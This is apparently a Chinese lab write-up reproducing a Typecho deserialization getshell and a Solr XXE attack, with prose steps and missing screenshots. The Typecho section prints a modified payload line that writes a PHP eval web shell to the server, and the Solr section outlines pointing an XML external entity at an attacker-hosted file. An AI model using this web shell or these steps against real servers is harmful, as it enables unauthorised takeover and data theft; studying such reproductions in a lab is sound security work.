本文仅提供于学术探讨,如有后果自行承担。
typecho反序列化漏洞Getshell复现
1.搭建漏洞环境
在搭建环境时,需要在数据库中建立于上图数据库名一样的库。
![]()
2.安装成功
显示上图则安装成功。
3. 这里需要一个payload,(这个会挂在文章下面,自行参考)。在kali上去跑一下。
4.在某狐浏览器使用hackbar来进行操作
在url后需要追加一个?finish=,利用Post传参之前,需要加上一个 __typecho_config=,再在后面加上在kali上跑出来的粘贴上,同时还需要referer参数,在里面填入服务器的IP地址即可。
5.上传getshell
这里需要对上面的payload进行修改,
"screenName" => "file_put_contents('shell.php','<?php @eval(\$_REQUEST[777])?>')",
修改之后在重发一次即可。
6.蚁剑链接
将生成shell的路径填写上即可。
solr XXE漏洞复现
1.启动服务,查看端口
2.访问网址
3.编写实体文件
4.提供外部访问
在你编写文件的目录下开启
然后启用另一个命令框来访问
复制http链接
5.构造xml文档
![]()
将上面复制的http链接粘贴进SYSTEM后面的引号中
然后转换为url编码
要将空格删除
6.BP抓包
![]()
将GET请求参数修改如上图,然后将刚刚进行url编码复制在q=后面,将【】删掉。
注意:在发送请求时候。不要关闭端口,同时也要查看xml文档跟url编码有无错误。